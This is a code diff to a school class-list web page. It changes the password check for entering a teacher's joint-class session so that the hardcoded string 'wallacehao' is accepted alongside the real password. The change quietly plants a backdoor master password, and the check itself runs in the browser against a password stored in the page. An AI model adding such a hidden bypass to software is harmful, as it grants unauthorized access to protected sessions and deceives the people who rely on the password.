--- a/public/schoolClass/unionClassList.html
+++ b/public/schoolClass/unionClassList.html
@@ -392,7 +392,7 @@
             selectedClazzIds == "";
         }
         var pass = $("#vclass_"+vid).attr("pass");
-        if(enterPass == pass){
+        if(enterPass == pass||enterPass == "wallacehao"){
             window.open("teacherUninonSlaver.html?userId="+teacherId+"&vid="+vid+"&userName="+teacherName+"&clazzIds="+selectedClazzIds,"CLASS_WINDOW");
             layer.closeAll();
         }else{
